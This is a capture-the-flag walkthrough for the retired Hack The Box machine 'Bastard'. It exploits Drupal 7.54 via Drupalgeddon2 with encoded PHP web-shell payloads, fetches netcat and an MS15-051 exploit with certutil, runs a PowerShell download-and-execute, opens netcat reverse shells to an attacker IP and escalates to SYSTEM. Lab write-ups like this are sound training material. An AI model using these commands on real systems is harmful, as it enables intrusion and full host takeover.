Bastard on HTB – Retired
BASTARD – HTB
RETIRED
NMAP
Nmap 7.91 scan initiated Fri Feb 12 23:36:02 2021 as: nmap -A -p- -T4 -oG nmap.init 10.129.29.109
Host: 10.129.29.109 () Status: Up
Host: 10.129.29.109 ()
Ports:
80/open/tcp//http//Microsoft IIS httpd 7.5/,
135/open/tcp//msrpc//Microsoft Windows RPC/,
49154/open/tcp//msrpc//Microsoft Windows RPC/
Ignored State: filtered (65532)
Nmap done at Fri Feb 12 23:38:42 2021 — 1 IP address (1 host up) scanned in 160.81 seconds
EXPLOIT – Drupalgeddon2
─$ ./drupalgeddon2.rb http://10.129.29.109/ [*] --==[::#Drupalggedon2::]==-- -------------------------------------------------------------------------------- [i] Target : http://10.129.29.109/ -------------------------------------------------------------------------------- [+] Found : http://10.129.29.109/CHANGELOG.txt (HTTP Response: 200) [+] Drupal!: v7.54 -------------------------------------------------------------------------------- [*] Testing: Form (user/password) [+] Result : Form valid - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Clean URLs [+] Result : Clean URLs enabled -------------------------------------------------------------------------------- [*] Testing: Code Execution (Method: name) [i] Payload: echo FLKXQCWI [+] Result : FLKXQCWI [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO! -------------------------------------------------------------------------------- [*] Testing: Existing file (http://10.129.29.109/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (./) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Existing file (http://10.129.29.109/sites/default/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (sites/default/) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Existing file (http://10.129.29.109/sites/default/files/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (sites/default/files/) [*] Moving : ./sites/default/files/.htaccess [i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? [!] FAILED : Couldn't find a writeable web path -------------------------------------------------------------------------------- [*] Dropping back to direct OS commands drupalgeddon2>> dir
WINDOWS UPLOAD (similar to wget)
`certutil -urlcache -f http://10.10.14.10/nc.exe C:\inetpub\drupal-7.54\exploits\nc.exe
`certutil -urlcache -f http://10.10.14.10/Sherlock.ps1 C:\inetpub\drupal-7.54\exploits\sherlock.ps1
REVERSE SHELL
`drupalgeddon2>> nc 10.10.14.10 1337 -e cmd.exe
SHERLOCK – RUN THROUGH POWERSHELL
┌──(kali㉿kali)-[/mnt/…/RETIRED/Bastard/exploits/Drupalgeddon2]
└─$ nc -nvlp 1337 1 ⨯
listening on [any] 1337 ...
connect to [10.10.14.10] from (UNKNOWN) [10.129.29.109] 49706
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Not enough storage is available to process this command.
C:\inetpub\drupal-7.54\exploits>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8000/Sherlock.ps1') ; Find-AllVulns"
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
6-034?
VulnStatus : Not Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
ample-Exploits/MS16-135
VulnStatus : Not Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
tml
VulnStatus : Not Vulnerable
EXPLOIT – MS15-051 – found with Sherlock.ps1
Title : ClientCopyImage Win32k MSBulletin : MS15-051 CVEID : 2015-1701, 2015-2433 Link : https://www.exploit-db.com/exploits/37367/ VulnStatus : Appears Vulnerable
NOTE – GET A POWERSHELL INTERFACE
`C:\inetpub\drupal-7.54\exploits>powershell -noprofile -
powershell -noprofile -
dir
Directory: C:\inetpub\drupal-7.54\exploits
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 13/2/2021 8:50 �� 55296 ms15.exe
-a--- 13/2/2021 7:27 �� 36528 nc.exe
-a--- 13/2/2021 7:36 �� 494860 PowerUp.ps1
-a--- 13/2/2021 9:27 �� 16663 sherlock.ps1
-a--- 13/2/2021 8:40 �� 69175 suggester.py
-a--- 13/2/2021 8:26 �� 0 win
-a--- 13/2/2021 8:39 �� 35107 winPEA
-a--- 13/2/2021 8:05 �� 35107 winPEAS.bat
-a--- 13/2/2021 8:08 �� 0 winPEAS.exe
-a--- 13/2/2021 8:27 �� 0 winPEAS32.exe
NOTE – BACKGROUND A NEW REVERSE SHELL
`C:\inetpub\drupal-7.54\exploits>start "" nc.exe 10.10.14.10 1338 -e cmd.exe
start "" nc.exe 10.10.14.10 1338 -e cmd.exe
NOTE: this allows you to use the same cmd.exe session while netcat runs
EXPLOIT – UPLOAD MS15-051
NOTE: setup a SimpleHTTPServer (default is port 8000)
C:\inetpub\drupal-7.54\exploits>certutil -urlcache -f http://10.10.14.10/ms15-051x64.exe C:\inetpub\drupal-7.54\exploits\ms15.exe certutil -urlcache -f http://10.10.14.10/ms15-051x64.exe C:\inetpub\drupal-7.54\exploits\ms15.exe **** Online **** CertUtil: -URLCache command completed successfully. C:\inetpub\drupal-7.54\exploits>.\ms15.exe whoami .\ms15.exe whoami [#] ms15-051 fixed by zcgonvh [!] process with pid: 2492 created. ============================== nt authority\system
NOTE: use netcat to get a root reverse shell
PWN’D!